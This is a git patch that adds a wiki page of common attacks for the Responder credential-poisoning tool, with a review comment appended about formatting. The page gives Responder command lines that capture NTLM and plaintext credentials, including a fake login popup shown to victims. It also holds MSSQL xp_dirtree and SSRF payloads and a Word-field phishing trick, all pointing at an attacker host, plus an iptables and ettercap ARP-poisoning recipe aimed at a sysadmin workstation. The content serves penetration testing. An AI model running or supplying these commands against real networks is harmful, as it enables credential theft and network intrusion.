From 4cbb264a0e64d1fb346f32284e3d6be8d85456c8 Mon Sep 17 00:00:00 2001 From: lgandx Date: Wed, 21 Apr 2021 16:31:32 -0300 Subject: [PATCH] Created Responder Common Attacks (markdown) --- Responder-Common-Attacks.md | 92 +++++++++++++++++++++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 Responder-Common-Attacks.md diff --git a/Responder-Common-Attacks.md b/Responder-Common-Attacks.md new file mode 100644 index 0000000..a497e3f --- /dev/null +++ b/Responder-Common-Attacks.md 
@@ -0,0 +1,92 @@ +# Responder Common Attacks: + +## Basic usage: + +Redirect workstations to Responder HTTP authentication server and grab NTLM credentials: +>./Responder.py -I wlp2s0 -r**F** + +Redirect workstations to Responder HTTP authentication server and grab plaintext credentials (this sends a login popup on the victim's workstation): +>./Responder.py -I wlp2s0 -r**b** + +Redirect workstations to Responder HTTP Proxy authentication server and grab NTLM credentials: +>./Responder.py -I wlp2s0 -r**P** + +Redirect workstations to Responder HTTP Proxy authentication server and grab plaintext credentials (this sends a login popup on the victim's workstation): +>./Responder.py -I wlp2s0 -r**Pb** + +Redirect workstations to Responder HTTP WPAD proxy and intercept web traffic (Responder will also inject a SMB UNC path to grab credentials transparently): +>./Responder.py -I wlp2s0 -r**w** + +Redirect workstations to Responder HTTP WPAD proxy, intercept web traffic and force NTLM authentication: +>./Responder.py -I wlp2s0 -r**wF** + +Redirect workstations to an other IP instead of Responder's one: +>./Responder.py -I wlp2s0 -r**e** 10.0.0.234 + +## More Advanced attacks + +Responder can be used as a poisoner but can also be used as rogue servers when combining with other attacks, these attacks will be documented below. + +### External Pentest +Responder can be used on an external pentest in the following situation: + +* XXE: + +Set your XXE payload this way: + +` ]>` + + +Watch for any HTTP hashes coming in on your Responder shell. 
+ +Another way would be to set a UNC path instead (less reliable since outbound SMB is often blocked): + +` ]>` + +* MSSQL SQLi: + +SQL Injection on MSSQL can lead to NTLMv1/2 hash grab: + +`xp_dirtree "\\RESPONDER-IP\share";` + +`xp_fileexist '\\RESPONDER-IP\file';` + + +* SSRF: + +Point your SSRF payload to Responder: + +`http://Responder-External-IP/123.html` + +* Phising: + +Create a word document and open it: + +`Hit CTRL + F9 -> IMPORT "\\\\Responder-IP\\123.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close.` + +When the victim opens the document, an SMB request will be issued to Responder-IP. + +### Internal Pentest + +Responder can be used as a rogue authentication server toolkit when combined with ARP poisoning. + +Let's take the example where you know that a sysadmin workstation is located at IP: 192.168.0.153 and you know that this sysadmin is using WinRM to administer servers remotely. + +Sysadmin workstation: + +192.168.0.153 + +Switch IP: + +192.168.0.254 + +Let's set an ARP Prerouting attack, and redirect the sysadmin workstation to our rogue WinRM server: + +//Block ICMP to prevent outgoing ICMP +> iptables -A OUTPUT -p ICMP -j DROP + +//Rewrite IP header destination with your IP instead of the original one for all packets going to TCP 5986 +> iptables -t nat -A PREROUTING -p tcp --dport 5986 -j DNAT --to-destination YOUR-IP:5986 + +//Enable IP Forward to avoid disruption and launch a targeted ARP attack against 192.168.0.153 +>echo 1 > /proc/sys/net/ipv4/ip_forward&&ettercap -T -q -w dump-session.pcap -p -M arp:remote /192.168.0.254// /192.168.0.153// \ No newline at end of file
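Review bot: the two XXE examples in the "External Pentest" section are effectively empty as committed: both inline code spans render as just ` ]>`, so the document shows no actual payload after "Set your XXE payload this way:" and "set a UNC path instead"; either the XML was lost when the markdown was written or the spans need a fenced block so the content survives rendering, and this should be checked before the page is published. Placeholders are inconsistent across the file (`RESPONDER-IP`, `Responder-IP`, `Responder-External-IP`, `YOUR-IP`); pick one spelling so readers know they all refer to the same host. The bold markers used to highlight flags (e.g. `-r**F**`, `-r**Pb**`) sit inside the command text, so anyone copying from the raw markdown gets literal asterisks; a short note on which letters are the flags, or a fenced block with the flag explained beside it, would be clearer. Wording: "Phising" should be "Phishing", "an other IP instead of Responder's one" should be "another IP instead of Responder's", and "inject a SMB UNC path" should be "an SMB UNC path". In the iptables section, the comment "Block ICMP to prevent outgoing ICMP" restates the rule rather than documenting why it is needed; a one-line rationale would help. Finally, the file ends with "No newline at end of file", so add a trailing newline.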